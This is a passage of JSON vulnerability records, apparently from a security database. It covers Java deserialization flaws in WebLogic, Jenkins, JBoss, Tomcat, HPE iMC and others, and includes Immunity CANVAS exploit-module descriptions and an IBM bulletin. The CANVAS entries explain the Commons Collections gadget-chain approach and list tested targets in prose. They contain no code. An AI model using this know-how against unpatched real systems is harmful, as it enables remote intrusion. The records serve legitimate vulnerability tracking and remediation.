"cpe:/a:atlassian:bamboo:5.11.3", "cpe:/a:atlassian:bamboo:5.12.0", "cpe:/a:atlassian:bamboo:5.12.2"], "id": "CVE-2016-5229", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-5229", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:atlassian:bamboo:5.12.2:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:5.12.1:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:5.11.3:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:5.12.0:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-03T14:34:32", "description": "HPE iMC PLAT before 7.2 E0403P04, iMC EAD before 7.2 E0405P05, iMC APM before 7.2 E0401P04, iMC NTA before 7.2 E0401P01, iMC BIMS before 7.2 E0402P02, and iMC UAM_TAM before 7.2 E0405P05 allow remote attackers to execute arbitrary commands via a crafted serialized Java object, related to the Apache Commons Collections (ACC) library.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-07-15T16:59:00", "type": "cve", "title": "CVE-2016-4372", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4372"], "modified": "2017-09-22T01:29:00", "cpe": ["cpe:/a:hp:intelligent_management_center_branch_intelligent_management_system:7.2", "cpe:/a:hp:intelligent_management_center_endpoint_admission_defense:7.2", "cpe:/a:hp:intelligent_management_center_platform:7.2", "cpe:/a:hp:intelligent_management_center_application_performance_manager:7.2", "cpe:/a:hp:intelligent_management_center_user_access_management:7.2", "cpe:/a:hp:intelligent_management_center_network_traffic_analyzer:7.2"], "id": "CVE-2016-4372", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-4372", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:hp:intelligent_management_center_user_access_management:7.2:*:*:*:*:*:*:*", "cpe:2.3:a:hp:intelligent_management_center_platform:7.2:*:*:*:*:*:*:*", "cpe:2.3:a:hp:intelligent_management_center_branch_intelligent_management_system:7.2:*:*:*:*:*:*:*", "cpe:2.3:a:hp:intelligent_management_center_application_performance_manager:7.2:*:*:*:*:*:*:*", "cpe:2.3:a:hp:intelligent_management_center_endpoint_admission_defense:7.2:*:*:*:*:*:*:*", "cpe:2.3:a:hp:intelligent_management_center_network_traffic_analyzer:7.2:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-23T15:05:55", "description": "Previous versions of Apache Flex BlazeDS (4.7.2 and earlier) did not restrict which types were allowed for AMF(X) object deserialization by default. During the deserialization process code is executed that for several known types has undesired side-effects. Other, unknown types may also exhibit such behaviors. One vector in the Java standard library exists that allows an attacker to trigger possibly further exploitable Java deserialization of untrusted data. Other known vectors in third party libraries can be used to trigger remote code execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-12-28T15:29:00", "type": "cve", "title": "CVE-2017-5641", "cwe": ["CWE-502"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5641"], "modified": "2022-04-19T16:06:00", "cpe": ["cpe:/a:apache:flex_blazeds:4.7.2"], "id": "CVE-2017-5641", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-5641", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:apache:flex_blazeds:4.7.2:*:*:*:*:*:*:*"]}], "ubuntucve": [{"lastseen": "2023-09-19T15:24:49", "description": "The WLS Security component in Oracle WebLogic Server 10.3.6.0, 12.1.2.0,\n12.1.3.0, and 12.2.1.0 allows remote attackers to execute arbitrary\ncommands via a crafted serialized Java object in T3 protocol traffic to TCP\nport 7001, related to\noracle_common/modules/com.bea.core.apache.commons.collections.jar. NOTE:\nthe scope of this CVE is limited to the WebLogic Server product.\n\n#### Bugs\n\n * <https://bugs.launchpad.net/ubuntu/+source/libcommons-collections3-java/+bug/1514985>\n * <https://bugzilla.redhat.com/show_bug.cgi?id=1279330>\n\n\n#### Notes\n\nAuthor| Note \n---|--- \n[sbeattie](<https://launchpad.net/~sbeattie>) | according to infoq article and digging through openjdk source, there is at least an embedded copy of xalan xslt in openjdk which is also vulnerable, though it may be just an example of a target class to overwrite via desrialization. same as above for libxalan2-java \n[mdeslaur](<https://launchpad.net/~mdeslaur>) | This CVE was originally assigned to Oracle WebLogic, and then was subsequently used by IBM Websphere. It has been proposed to use it for commons-collections. See: http://www.openwall.com/lists/oss-security/2015/11/15/1 Red Hat has assigned CVE-2015-7501 to the issue in JBoss Middleware Suite as of 2018-09-19, no indication that this is being fixed in openjdk, or if it is an issue at all. Marking as ignored.\n", "cvss3": {}, "published": "2015-11-18T00:00:00", "type": "ubuntucve", "title": "CVE-2015-4852", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-4852", "CVE-2015-7501"], "modified": "2015-11-18T00:00:00", "id": "UB:CVE-2015-4852", "href": "https://ubuntu.com/security/CVE-2015-4852", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-04T14:14:07", "description": "Remote code execution is possible with Apache Tomcat before 6.0.48, 7.x\nbefore 7.0.73, 8.x before 8.0.39, 8.5.x before 8.5.7, and 9.x before\n9.0.0.M12 if JmxRemoteLifecycleListener is used and an attacker can reach\nJMX ports. The issue exists because this listener wasn't updated for\nconsistency with the CVE-2016-3427 Oracle patch that affected credential\ntypes.\n\n#### Bugs\n\n * <https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=802312>\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-11-24T00:00:00", "type": "ubuntucve", "title": "CVE-2016-8735", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3427", "CVE-2016-8735"], "modified": "2016-11-24T00:00:00", "id": "UB:CVE-2016-8735", "href": "https://ubuntu.com/security/CVE-2016-8735", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-09-29T18:16:28", "description": "Jenkins versions 2.56 and earlier as well as 2.46.1 LTS and earlier are\nvulnerable to an unauthenticated remote code execution. An unauthenticated\nremote code execution vulnerability allowed attackers to transfer a\nserialized Java `SignedObject` object to the Jenkins CLI, that would be\ndeserialized using a new `ObjectInputStream`, bypassing the existing\nblacklist-based protection mechanism. We're fixing this issue by adding\n`SignedObject` to the blacklist. We're also backporting the new HTTP CLI\nprotocol from Jenkins 2.54 to LTS 2.46.2, and deprecating the\nremoting-based (i.e. Java serialization) CLI protocol, disabling it by\ndefault.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-01-29T00:00:00", "type": "ubuntucve", "title": "CVE-2017-1000353", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-1000353"], "modified": "2018-01-29T00:00:00", "id": "UB:CVE-2017-1000353", "href": "https://ubuntu.com/security/CVE-2017-1000353", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-04T14:12:41", "description": "The remoting module in Jenkins before 2.32 and LTS before 2.19.3 allows\nremote attackers to execute arbitrary code via a crafted serialized Java\nobject, which triggers an LDAP query to a third-party server.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-01-12T00:00:00", "type": "ubuntucve", "title": "CVE-2016-9299", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9299"], "modified": "2017-01-12T00:00:00", "id": "UB:CVE-2016-9299", "href": "https://ubuntu.com/security/CVE-2016-9299", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-09-29T20:04:20", "description": "In Jboss Application Server as shipped with Red Hat Enterprise Application\nPlatform 5.2, it was found that the doFilter method in the\nReadOnlyAccessFilter of the HTTP Invoker does not restrict classes for\nwhich it performs deserialization and thus allowing an attacker to execute\narbitrary code via crafted serialized data.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-10-04T00:00:00", "type": "ubuntucve", "title": "CVE-2017-12149", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-12149"], "modified": "2017-10-04T00:00:00", "id": "UB:CVE-2017-12149", "href": "https://ubuntu.com/security/CVE-2017-12149", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-28T14:28:30", "description": "Apache Tika before 1.14 allows Java code execution for serialized objects\nembedded in MATLAB files. The issue exists because Tika invokes JMatIO to\ndo native deserialization.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[sbeattie](<https://launchpad.net/~sbeattie>) | introduced in tika 1.6\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-04-06T00:00:00", "type": "ubuntucve", "title": "CVE-2016-6809", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-6809"], "modified": "2017-04-06T00:00:00", "id": "UB:CVE-2016-6809", "href": "https://ubuntu.com/security/CVE-2016-6809", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-08-09T21:36:13", "description": "The Jenkins CLI subsystem in Jenkins before 1.638 and LTS before 1.625.2\nallows remote attackers to execute arbitrary code via a crafted serialized\nJava object, related to a problematic\nwebapps/ROOT/WEB-INF/lib/commons-collections-*.jar file and the \"Groovy\nvariant in 'ysoserial'\".\n\n#### Bugs\n\n * <http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=804522>\n", "cvss3": {}, "published": "2015-11-25T00:00:00", "type": "ubuntucve", "title": "CVE-2015-8103", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-8103"], "modified": "2015-11-25T00:00:00", "id": "UB:CVE-2015-8103", "href": "https://ubuntu.com/security/CVE-2015-8103", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "canvas": [{"lastseen": "2021-07-28T14:33:24", "description": "**Name**| weblogic_t3_deserialization \n---|--- \n**CVE**| CVE-2015-4852 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| weblogic_t3_deserialization \n**Notes**| CVE Name: CVE-2015-4852 \nVENDOR: Oracle \nNOTES: \nIMPORTANT NOTE: Any instance of this application running Apache Commons Collections version prior to 3.0 WILL NOT WORK. \n \n \nWeblogic's AdminServer servlet allows remote administration (often unauthenticated) via the \nproprietary T3 protocol. This protocol is similar to RMI in the sense that it depends on the exchange \nof serialized Java objects that are then re-serialized. Apache Commons pre-3.2.2 allows users to \nserialize transformers on collection values. Of importance to us is the InvokerTransfomer, which \nis capable of invoking Java methods. We are able to run these transformers by adding them to an \nannotation map whose members are acccessed. The right chain of method invocations leads to arbitrary \ncode execution. \n \nVersion support: \nInstaller did not support the JVM version unless marked otherwise. \n&gt; Ubuntu Linux 14.04.3 - x86 \n\\- 10.3.6 on Java SE 6 \n\\- 10.3.6 on JRockit 1.6 - NOT SUPPORTED \n\\- 12.2.1 on Java SE 8 () \n\\- 12.1.2 on Java SE 7 / 8 \n\\- 12.1.3 on Java SE 7 / 8 \n&gt; Windows 7 Ultimate SP 1 x86 \n\\- 12.1.3 on Java SE 8 - FAILED \n\\- 12.1.3 on Java SE 7 \n\\- 12.1.2 on Java SE 7 \n\\- 12.2.1 on Java SE 8 - FAILED \n\\- 12.2.1 on Java SE 6 - Installer does not support Java version \n\\- 12.2.1 on Java SE 7 - Installer does not support Java version \n\\- 10.3.6 on Java SE 6 \n\\- 10.3.6 on JRockit 1.6 - NOT SUPPORTED \n \n \nRepeatability: One Shot \nReferences: ['http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/', 'https://blogs.apache.org/foundation/entry/apache_commons_statement_to_widespread', 'http://www.oracle.com/technetwork/topcis/security/alert-cve-2015-4852-2763333.html', 'https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-7501'] \nCVE Url: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4852 \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-11-09T17:29:00", "type": "canvas", "title": "Immunity Canvas: WEBLOGIC_T3_DESERIALIZATION", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7501", "CVE-2015-4852"], "modified": "2017-11-09T17:29:00", "id": "WEBLOGIC_T3_DESERIALIZATION", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/weblogic_t3_deserialization", "sourceData": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-28T14:33:20", "description": "**Name**| vrealize_vcofactory_deserialize \n---|--- \n**CVE**| CVE-2015-6934 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| vrealize_vcofactory_deserialize \n**Notes**| CVE Name: CVE-2015-6934 \nVENDOR: VMWare \nNOTES: \nIMPORTANT NOTE: Any instance of this application running Apache Commons Collections version prior to 3.0 WILL NOT WORK. \n \n \nVMWare VRealize has a remoting interface named vcofactory. It communicates with a client by exchanging \nserialized Java objects. \n \nApache Commons pre-3.2 allows users to serialize \ntransformers on collection values. Of importance to us is the InvokerTransfomer, which is capable \nof invoking Java methods. We are able to run these transformers by adding them to an \nannotation map whose members are acccessed. The right chain of method invocations leads to arbitrary \ncode execution. \n \nTested targets: \n&gt; vRealize 6.0.1.2490144 \n\\- Windows 8.1 Pro x86_64 EN / Java 6u45 - SUCCESS \n\\- Windows 8.1 Pro x86_64 EN / Java 7u80 - SUCCESS \n\\- Windows 8.1 Pro x86_64 EN / Java 8u73 - SUCCESS \n \n&gt; vCenter Orchestrator Appliance \n\\- Appliance's VMDK is corrupted \n \n&gt; vRealize Operations Manager Appliance 6.2.0.3 \n\\- Publically accessible interfaces require client certificate authentication. A CA-signed client certificate is necessary to connect. \n \nRepeatability: Infinite \nReferences: ['https://www.vmware.com/security/advisories/VMSA-2015-0009'] \nCVE Url: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6934 \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "LOW", "baseScore": 7.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.4}, "published": "2015-12-21T03:59:00", "type": "canvas", "title": "Immunity Canvas: VREALIZE_VCOFACTORY_DESERIALIZE", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-6934"], "modified": "2015-12-21T03:59:00", "id": "VREALIZE_VCOFACTORY_DESERIALIZE", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/vrealize_vcofactory_deserialize", "sourceData": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-28T14:33:32", "description": "**Name**| jenkins_cli_deserialization \n---|--- \n**CVE**| CVE-2015-8103 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| jenkins_cli_deserialization \n**Notes**| CVE Name: CVE-2015-8103 \nVENDOR: Jenkins \nNOTES: \nIMPORTANT NOTE: Any instance of this application running Apache Commons Collections version prior to 3.0 WILL NOT WORK. \n \n \nJenkins has a remote command line interface console. It is often unauthenticated. It communicates \nwith a client by exchanging serialized Java Objects. Apache Commons pre-3.2.2 allows users to \nserialize transformers on collection values. Of importance to us is the InvokerTransfomer, which \nis capable of invoking Java methods. We are able to run these transformers by adding them to an \nannotation map whose members are acccessed. The right chain of method invocations leads to arbitrary \ncode execution. \n \nNOTE: By default, Jenkins starts its management web application on 0.0.0.0:8080. \nFor this module to work, both the web interface specified above *and* the CLI port specified by the \nX-Jenkins-CLI-Port element in the HTTP response headers from said web interface need to be \naccessible by the CANVAS host. \n \nVersion support: \n&gt; Windows 7 Ultimate SP1 x86 \n\\- 1.598 on Java SE 6 / 7 / 8 \n\\- 1.637 on Java SE 6 / 7 / 8 \n&gt; Ubuntu Linux 14.04.3 - x86 \n\\- 1.598 on Java SE 6 / 7 / 8 \n\\- 1.600 on Java SE 6 / 7 / 8 \n\\- 1.637 on Java SE 6 / 7 / 8 \n \nRepeatability: Infinite \nReferences: ['http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/', 'https://wiki.jenkins-ci.org/display/SECURITY/Jenkins+Security+Advisory+2015-11-11'] \nCVE Url: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8103 \n\n", "cvss3": {}, "published": "2015-11-25T20:59:00", "type": "canvas", "title": "Immunity Canvas: JENKINS_CLI_DESERIALIZATION", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-8103"], "modified": "2015-11-25T20:59:00", "id": "JENKINS_CLI_DESERIALIZATION", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/jenkins_cli_deserialization", "sourceData": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "ibm": [{"lastseen": "2023-02-21T01:44:41", "description": "## Summary\n\nApache Commons Collections and Apache Groovy vulnerabilities for handling Java object deserialization were addressed by IBM UrbanCode Build\n\n## Vulnerability Details\n\n**CVE-ID:** [CVE-2015-7450](<https://vulners.com/cve/CVE-2015-7450>) \n**Description:** Apache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system. \n**CVSS Base Score: **9.8 \n**CVSS Temporal Score**: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/107918> for the current score \n**CVSS Environmental Score*:** Undefined \n**CVSS Vector: **(CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n**CVE-ID:** [CVE-2015-3253](<https://vulners.com/cve/CVE-2015-3253>) \n**Description:** Apache Groovy could allow a remote attacker to execute arbitrary code on the system, caused by the failure to isolate serialization code when using standard Java serialization mechanim to communicate between servers. An attacker could exploit this vulnerability to deserialize objects and execute arbitrary code on the system or cause a denial of service. \n**CVSS Base Score: **7.3 \n**CVSS Temporal Score**: See [](<http://xforce.iss.net/xforce/xfdb/103792>)<https://exchange.xforce.ibmcloud.com/vulnerabilities/104819> for the current score \n**CVSS Environmental Score*:** Undefined \n**CVSS Vector: **(CVSS:3.0/AV:N/AC:L/PR:N/UI:N/C:L/I:L/A:L)\n\n## Affected Products and Versions\n\nIBM UrbanCode Build 6.1.0, 6.1.0.1, 6.1.0.2, and 6.1.1 on all supported platforms.\n\n## Remediation/Fixes\n\nUpgrade to IBM UrbanCode Build 6.1.1.1.\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-17T22:32:15", "type": "ibm", "title": "Security Bulletin: Vulnerabilities in Apache Commons Collections and Apache Groovy affects IBM UrbanCode Build (CVE-2015-7450, CVE-2015-3253)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": 